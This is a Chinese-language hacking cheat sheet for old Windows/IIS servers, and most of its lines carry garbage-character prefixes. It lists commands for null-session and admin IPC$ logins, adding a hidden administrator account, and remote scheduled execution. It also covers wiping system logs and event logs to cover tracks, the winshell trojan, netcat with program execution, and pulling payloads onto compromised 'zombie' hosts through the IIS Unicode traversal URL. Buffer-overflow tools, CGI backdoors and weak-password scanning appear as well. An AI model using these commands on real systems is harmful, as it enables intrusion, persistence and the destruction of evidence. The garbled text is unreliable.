网管和黑客都必须知道的命令
9lV'�3UG-? 常用的几条NET命令:
:��6�V��8 Q>$L;�1E*, (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
]EQ/*���ct y�k�2j�&}M (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
`l"~"x^Rr 9<S-b |!@� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
6��<�Z9p@6 h�[�T3�WE� (查看远程主机时间) net time \\IP地址
e�
AjtW�qg [dMxr9���M (定时启动某个程序) at \\IP地址 02:18 readme.exe
:^a$ve3(Jq ,-�)1)�R\. (查看共享) net view \\IP地址
N{g=Pf?I}� zhE7+`�`�g (查看netbios工作组列表) nbtstat -A IP地址
{IW�b:p#I] J~.k�b� �k (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
q�a6�~N3*� �f6�nl�t�Z (这两条把自己增加到管理员组): net user 用户名 密码 /add
*�gVv7�4;; e�z{��&Y>n net localgroup Administrators 用户名 /add
6bba�}��P� �L�Kc�rr�; (断开连接) net use \\IP地址\ipc$ /delete
UhK,�H �� ��GWK�efH 扫尾:
3yN1cd"�#? B�L6�7sva; del C:\winnt\system32\logfiles\*.*
��sa*��-B ��:cTi�$n� del C:\winnt\ssytem32\config\*.evt
qv\�y�Q&pj RMK
�U�5A7 del C:\winnt\system32\dtclog\*.*
�uE(w$2�Wi
�y1�X.Mvc del C:\winnt\system32\*.log
~_%[j8o�&l pG&�.Ye]j del C:\winnt\system32\*.txt
"�Q1hP�9xV s3J$+1M�> del C:\winnt\*.txt
0P(}e�[�~Z M_K&�x�-H0 del C:\winnt\*.log
]�mS�VjF3l ?L^ Gu ]�y 一、netsvc.exe
.� �{I7sUQ =%LS9e^�7D 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
7Y��/_/t~Y q��M+T �Wp netsvc /list \\IP地址
r� �DuG[" k��"J�?-1L netsvc schedule \\IP地址 /query
zV�u}7v(�) o;fQ,r�P%� netsvc \\IP地址 schedule /start
^-��Z��qS� 0�W> ",2|z 二、OpenTelnet.exe
;q ��Z�2�V #Z�� :��r 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�I�/g�]9
y P}���gh-5x OpenTelnet \\IP地址 用户名 密码 1 7878
#��LiC��@> �\Z�8!iruN 然后就可以telnet到主机的7878端口,进入DOS方式下:
\B)��<<[ $ Y2Bu,�/9^� telnet IP地址 7878
\GWC5R7Q0j O);V��{1P� 三、winshell.exe
i��&Ea�@b� ��eo!z>9#. 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
N�QmDm!-4� zx2�7aZ�[� p Path (查看winshell主程序的路径信息)
�_),@�^^&x A Ho<E�"R\ b reBoot (重新启动机器)
<�$E8�T>�U vJ!t.Vo��u d shutDown (关闭机器)
R-ci?7d�t3 C�}CX n X s Shell (执行后你就会看到可爱的“C:\>”)
R##O9BSI8Z "2�m�V�W_k x eXit (退出本次登录会话,此命令并不终止winshell的运行)
F>�OYZ�OC] 7DD�ot_qb� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
$\��H�>dm� r�AWBuEU;! 四、3389登陆器,GUI方式登录远程主机的
]#`bYh�^�y �[{Y�V<kN 五、elsave.exe
ZYG"nm�Nd� �"LYob}_�z 事件日志清除工具
~c4Y��*]J� Ae1�},2�py elsave -s \\IP地址 -l "application" -C
[*fn�Ty�� t1k��D5�^ elsave -s \\IP地址 -l "system" -C
nP.d5%���E 3hkA`YSYt elsave -s \\IP地址 -l "security" -C
pi�U4%EO� ,M9'S;&^�� 执行后成功清除应用程序日志,系统日志,安全日志
]Sh�&8 #�� ][�3 �"xP 六、hbulot.exe
a.P^+���h� N�'4�*L=Ut 开启win2kserver和winxp的3389服务
tZJKB1#WbP sB�� $!X@ hbulot [/r]
��.$�Y[>9� �^-�DK<jZ^ 使用/r表示安装完成后自动重起目标使设置生效。
6�`'^$�wKs di"*K*�~y 七、nc.exe(netcat.exe)
=3FXU{"Qi4 �\-^3�P�e, 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�OA�+W�$�� ��d�/e9LK 想要连接到某处: nc [-options] hostname port[s] [ports] ...
8��_>R�'u[ �5Q�l�J�X� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
*���{uu_O )�[A}h'�J) 参数:
,�W.O*vC�A 7E�v~y�Y;N -e prog 程序重定向,一旦连接,就执行 [危险!!]
d%�WF�g�f} Q9(
eH2��= -g gateway source-routing hop point[s], up to 8
m#uu�tomi0 9�rh�z#��w -G num source-routing pointer: 4, 8, 12, ...
bp� }~{]:b 17-K~y�bc� -h 帮助信息
@ ~PL|�Pp_ xMe[�/7)�4 -i secs 延时的间隔
9vX�rC_W�9 s;>jy/o0 s -l 监听模式,用于入站连接
, =#'?>Kq� Ox58�L>:0m -n 指定数字的IP地址,不能用hostname
Q�~jU�Z-qN ��@r�E��>D -o file 记录16进制的传输
44!b��wXz8 E�]bjI�$j -p port 本地端口号
8��$�1<�N ]1�X�];x&e -r 任意指定本地及远程端口
wuPx�6hC�l \5Hfe;ny-~ -s addr 本地源地址
T3���\�Q< @�hk~8y]rz -u UDP模式
#�fQ��St�O 8��kk$�:�8 -v 详细输出——用两个-v可得到更详细的内容
;#AV~Y-�
s �j �&~OR6� -w secs timeout的时间
;%Qu�;�FtC xand%XNv� -z 将输入输出关掉——用于扫描时
J54�29Soo� 八、TFTPD32.EXE
}nkX-P��G9 ��)��H)HR` 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
^27r-�0|l^ ^��hU7Qx�W http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
RK|C*�TCnl m�!g�
f�!� 然后可以直接令文件运行:
�lOql(ZH`w Y6�+n�fh�_ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
hS<+=3
<M� 8xLvp��gcZ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
��leiP/D6s tv5SQ+AI3
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
Ok9XC <X�u �t|1?m�H�9 一、一 Xscan命令行运行参数说明:
ri6_u;��Ch {@k�5e�)
Q 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
K�"eW.���$ QD<f)�JZ�K 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
/�mmC���qP |[�8&5[)�; xscan -file <主机列表文件名> <检测项目> [其他选项]
��I�G
6yt� q45H��mz�� 其中<检测项目> 含义如下:
h60*=+vdJ� 4\3Z$%2^LZ -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
|*�H�w6m� <�y��BZsSj -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
PC/�Oo~Gx �woQY�P,� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
P/4]x@{ih� �[*@"[u� � -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
O�T+LQ TE :2}zovsdj� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
.#@*)1A#�t bP(xMw<'�j [其他选项] 含义如下:
}Dm-I�bdg( �Fc{hzqaP8 -v: 显示详细扫描进度
XB
zc�bS�+ .cjSg�K1�� -p: 跳过Ping不通的主机
y�^�?7d�e} Z%k)'%_�� -o: 跳过没有检测到开放端口的主机
p1q"[)WVn^ Bi�9 S�1�p -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
